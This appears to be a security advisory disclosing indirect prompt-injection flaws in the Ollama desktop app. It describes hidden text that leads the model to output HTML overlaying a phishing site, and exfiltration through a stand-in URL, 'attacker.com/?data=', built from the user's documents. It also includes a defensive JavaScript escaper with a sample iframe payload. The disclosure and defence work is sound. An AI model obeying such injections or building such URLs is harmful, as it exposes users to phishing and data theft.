Ollama’s desktop app is vulnerable to phishing overlay and data exfiltration attacks via indirect prompt injection, overwriting the app with an attacker’s site.
Context
Ollama is a leading tool for leveraging AI models, with over 170,000 stars on GitHub. Multiple vulnerabilities in the desktop app have been identified, enabling phishing and data exfiltration attacks.
The entire Ollama desktop interface can be overwritten by an attacker-controlled website via an indirect prompt-injection attack due to insecure rendering of model outputs.
Three zero-click data exfiltration vectors exploitable via indirect prompt injection were also identified.
Note: No human-in-the-loop approval steps are required for any attacks in this article.
These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.
The Attack Chain
1. The user asks Ollama about an external website or an externally sourced file.
2. A prompt injection is hidden on the external site in 1 pt font, white-on-white text.
3. The AI model is manipulated to believe it must output an HTML element as part of its explanation to the user, and outputs malicious HTML that overwrites the user interface with an attacker-controlled website.
   Note: Quitting and re-opening Ollama does not close the malicious overlay.
4. The attacker logs the credentials entered into the malicious overlay.
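The overlay exists because the model's reply reaches the UI as HTML rather than as text. As an added illustration (not Ollama's code, and making no claim about how the Ollama app itself renders replies), the JavaScript below escapes a reply before applying a small markdown subset, so a tag the model was coaxed into emitting is shown as visible text instead of being rendered, and separately flags replies that contain raw tags so they can be reviewed. The `attacker.example` host and the sample reply are constructed.

```javascript
// Added example (not Ollama's code): treat model output as text, never as markup.
// Assumption: the chat UI receives the reply as a string and builds the DOM from
// it; the conversion below stands in for that step.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape every character that could open or close an element or attribute.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Render a reply: escape first, then allow only **bold**, `code` and line breaks.
// A `<iframe>` or `<div>` the model emits survives only as visible text, so it
// cannot cover the window the way `container.innerHTML = reply` would let it.
function renderSafe(modelText) {
  let html = escapeHtml(modelText);
  html = html.replace(/\*\*([^*\n]+)\*\*/g, '<strong>$1</strong>');
  html = html.replace(/`([^`\n]+)`/g, '<code>$1</code>');
  return html.replace(/\n/g, '<br>');
}

// Detection helper: a reply that explains a web page has little reason to
// contain raw tags, so their presence is worth surfacing to the user or a log.
function containsRawHtml(modelText) {
  return /<\/?[a-zA-Z][^>]*>/.test(modelText);
}

// Constructed sample reply of the shape the article describes: a summary
// followed by a full-window element pointing at an attacker-controlled site.
const SAMPLE_REPLY =
  'Here is the summary of the page:\n' +
  '<iframe src="https://attacker.example/" style="position:fixed;inset:0"></iframe>';

// Usage: the rendered string never contains a live <iframe>, only "&lt;iframe".
const rendered = renderSafe(SAMPLE_REPLY);
const flagged = containsRawHtml(SAMPLE_REPLY);
```

The design choice is that escaping happens before any markup of the renderer's own is applied, so the allowlist of formatting is the only way for angle brackets to reach the DOM; a sanitizer that runs after the model's HTML is already parsed has to enumerate every dangerous tag and attribute instead.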
Data Exfiltration Attacks
In addition to the phishing risk noted above, three zero-click data exfiltration vectors that are exploitable via indirect prompt injection were identified:
- Data exfiltration via insecure web search tooling
- Data exfiltration via insecure rendering of Markdown image outputs
- Data exfiltration via insecure rendering of external HTML elements
Below is a data exfiltration attack chain that weaponizes insecure web search tooling:
Note: This attack uses the same malicious website, but with a different prompt injection.
1. A data source with a prompt injection is ingested (website, document, etc.).
2. The AI is manipulated to access a malicious URL, exfiltrating data from documents the user has been working with: the model is manipulated to construct a URL using the attacker’s domain, with data from the victim’s previously uploaded documents stored in query parameters, for example:
   attacker.com/?data={AI puts the user’s data here}
3. The attacker’s server logs the model’s request, including the victim’s data.
Responsible Disclosure
Timeline
- Dec 18, 2025: PromptArmor discloses to Ollama
- Jan 20, 2026: PromptArmor follows up
- Jan 26, 2026: PromptArmor follows up
- Jan 29, 2026: PromptArmor follows up
- Feb 19, 2026: PromptArmor follows up
- May 28, 2026: Article published